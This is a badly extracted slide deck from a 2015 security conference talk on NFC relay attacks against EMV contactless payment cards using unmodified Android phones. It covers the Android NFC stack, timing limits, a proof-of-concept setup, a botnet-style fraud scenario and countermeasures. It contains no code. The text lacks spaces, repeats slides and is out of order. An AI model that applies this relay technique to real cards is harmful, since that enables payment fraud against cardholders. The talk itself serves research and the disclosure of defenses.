BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 13 36
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer
Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc
httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci
httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc
httpnfc-forumorgour-workspecifications-and-application-documentsspecifications
nfc-controller-interface-nci-specifications
httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical
20Specificationpdf
httpwwwdatasheet4ucomPDF845670BCM20793Shtml
httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (VI)Some remarkable limitations
Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands
Caused by the CRC computation performed by the NFCC
Overcome whether NFCC is modified
EMV contactless cards are IsoDep fully ISOIEC 14443-compliant
Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode
AID must be known in advance
Overcome whether device is rooted
Xposed framework may help to overcome this issue but needs rootpermissions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice uml
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks
Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz
FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s
Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed
Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed
And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (I)Experiment configuration
PoS device Ingenico IWL280 with GRPS + NFC support
Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices
One constraint only dishonest prover must run an Android ge 44
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36
Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1
Distributed Mafia Fraud
BOT
BOTMASTER
BOT
BOT
BOT
BOT
BOT
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36
Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2
Hiding Fraud Locations
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36
Relay Attack Implementation (IV)Resistant Mechanisms
Brief summary of resistant mechanismsDistance-bounding protocols
Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages
Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands
Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36
Related WorkOn relay attacks
2005-2009 First works built on specific hardware
2010 Nokia mobile phones with NFC capability plus a Java MIDletapp
2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device
2014 Active relay attacks with custom hardware and customAndroid firmware
Several works studied delay upon relay channel
Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint
Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (I)
Security of NFC is based on the physical proximity concern
NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising
Abuse to interact with cards in its proximity
ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices
Threat scenarios introduced
Virtual pickpocketing attack may appear before long
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (II)But then what the hell can I do Should I run away
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Conclusions (III)
Future WorkDevelopa botnetinfrastructureandearnmoney
Timing constraints of Android HCE mode
Try active relay attacks within EMV contactless cards
AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)
University of Leon under contract X43
HITB staff
And thanks to all for hearing us
Visit httpvwzqnetrelaynfc for more info about the project
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36
Relay Attacks in EMV Contactless Cardswith Android OTS Devices
Jose Viladagger Ricardo J RodrıguezDagger
pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed
daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity
University of Zaragoza Spain University of Leon Spain
May 28 2015
Hack in the Box 2015Amsterdam (Nederland)
Background (I)EMV contactless cards
Europay Mastercard and VISA standard for inter-operation of ICcards Point-of-Sale terminals and automated teller machines
Authenticating credit and debit card transactionsCommands defined in ISOIEC 7816-3 and ISOIEC 7816-4(httpenwikipediaorgwikiEMV)
Application ID (AID) command
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 14 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (II)MasterCard PayPass VISA payWave and AmericanExpress ExpressPay
Are they secure
Amount limit on a single transactionUp to pound20 GBP 20euro US$50 50CHF CAD$100 or AUD$100
cof cof(httpwwwbankinfosecuritycomandroid-attack-exploits-visa-emv-flaw-a-7516op-1)
Sequential contactless payments limited ndash it asks for the PIN
Protected by the same fraud guarantee as standard transactions(hopefully)
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 15 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperate
Honest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Background (III)
Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)
Mafia frauds ndash Y Desmedt (SecuriComrsquo88)
P minusrarr V communication link P minusrarr V
Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36
Agenda
1 Introduction
2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds
3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android
4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms
5 Related Work
6 Conclusions
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36
Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support
Android 42 Jelly Bean (API level 17)
NfcBarcode
IsoPcdB(ISOIEC 14443-4B)
IsoPcdA(ISOIEC 14443-4A)
Android CyanogenMod OS 91
NfcA(ISOIEC 14443-3A)
NfcB(ISOIEC 14443-3B)
NfcV(ISOIEC 15693)
IsoDep(ISOIEC 14443-4)
NfcF(JIS 6319-4)
Ndef
Android 233 Gingerbread (API level 10)
NdefFormatable MifareClassic
MifareUltralight
Android 44 KitKat (API level 19)
thanks to Doug Year
Software
ReaderWriter
Peer-to-peer
Card-emulation
Hardware
Card-emulation
Software
ReaderWriter
Peer-to-peer
Hardware
Card-emulation NfcAdapterReaderCallback
added
NFC
op
erati
on
mod
es
su
pp
orte
d
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (II)Digging into Android NFC stack
Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)
libnfc-nxp
libnfc-nci
NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36
Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode
Not allowed to be set directlyrarr Android activity
Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)
Makes communication between layers and modules easier
User App
Tag
NFC developer framework
NfcService
mTagServicetransceive
IPC
TagService
DeviceHostTagEndPoint
ltltrealizegtgt
NativeNfcTag
JNI
doTransceive
System NFC Library
NativeNfcTagcpp
libnfc-nci
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36
Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode
A service must be implemented to process commands and replies
HostApduService abstract class and processCommandApdu methodAID-based routing service table
This means you need to declare in advance what AID you handle
J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36
Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary
Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes
(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)
NFC Android kernel driver C Hardware and manufac-turer
Yes
